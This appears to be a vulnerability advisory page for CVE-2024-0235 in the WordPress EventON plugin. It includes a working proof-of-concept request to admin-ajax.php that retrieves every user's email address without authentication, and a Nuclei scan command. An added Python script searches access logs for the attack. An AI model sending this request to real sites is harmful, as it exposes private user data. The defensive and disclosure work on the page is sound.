Exploit for WordPress Plugin EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Information Disclosure (CVE-2024-0235)

Description:

The EventON WordPress plugin before 4.5.5 and the EventON WordPress plugin before 2.2.7 do not perform an authorization check in an AJAX action, allowing unauthenticated users to retrieve the email addresses of any users on the blog.

Affected Products:

Proof of Concept

PoC exploits

The following HTTP request demonstrates how to retrieve email addresses:

  POST /wp-admin/admin-ajax.php?action=eventon_get_virtual_users HTTP/1.1
  Host: <target-site>
  Content-Type: application/x-www-form-urlencoded

  _user_role=administrator
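
To check whether a site has already received this request, the web server access log can be searched for calls to the action. The following is an added example, not part of the original page or of the plugin's code; it assumes Combined Log Format, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

ACTION = "eventon_get_virtual_users"  # AJAX action named in the request above

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_hits(lines):
    """Return parsed log entries that call the EventON action on admin-ajax.php."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        url = urlsplit(m["target"])
        # endswith() also covers WordPress installed in a subdirectory
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        if ACTION in parse_qs(url.query).get("action", []):
            hits.append({"ip": m["ip"], "time": m["time"], "status": int(m["status"]),
                         "size": int(m["size"]) if m["size"].isdigit() else 0})
    return hits

def summarize(hits):
    """Per-client totals; clients with 200 responses are the ones to review first."""
    per_ip = defaultdict(lambda: {"requests": 0, "ok": 0, "bytes": 0})
    for h in hits:
        s = per_ip[h["ip"]]
        s["requests"] += 1
        if h["status"] == 200:
            s["ok"] += 1
            s["bytes"] += h["size"]
    return dict(per_ip)

# Constructed sample lines (documentation IP ranges, not real traffic)
SAMPLE = [
    '203.0.113.7 - - [12/Jan/2024:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=eventon_get_virtual_users HTTP/1.1" 200 512 "-" "curl/8.4.0"',
    '203.0.113.7 - - [12/Jan/2024:10:01:05 +0000] "POST /blog/wp-admin/admin-ajax.php?action=eventon_get_virtual_users HTTP/1.1" 200 498 "-" "curl/8.4.0"',
    '198.51.100.20 - - [12/Jan/2024:10:02:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 60 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Jan/2024:10:03:00 +0000] "POST /wp-admin/admin-ajax.php?action=eventon_get_virtual_users HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(summarize(find_hits(SAMPLE)))
```

Access logs in this format do not record cookies, so a hit does not by itself show that the caller was unauthenticated; treat each one as a lead to review against the plugin version installed at the time.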

Nuclei Template

View the template here: CVE-2024-0235.yaml

Validate with Nuclei

  echo "$URL" | nuclei -t ~/nuclei-templates/http/cves/2024/CVE-2024-0235.yaml

References:

https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
https://github.com/fkie-cad/nvd-json-data-feeds
https://nvd.nist.gov/vuln/detail/CVE-2024-0235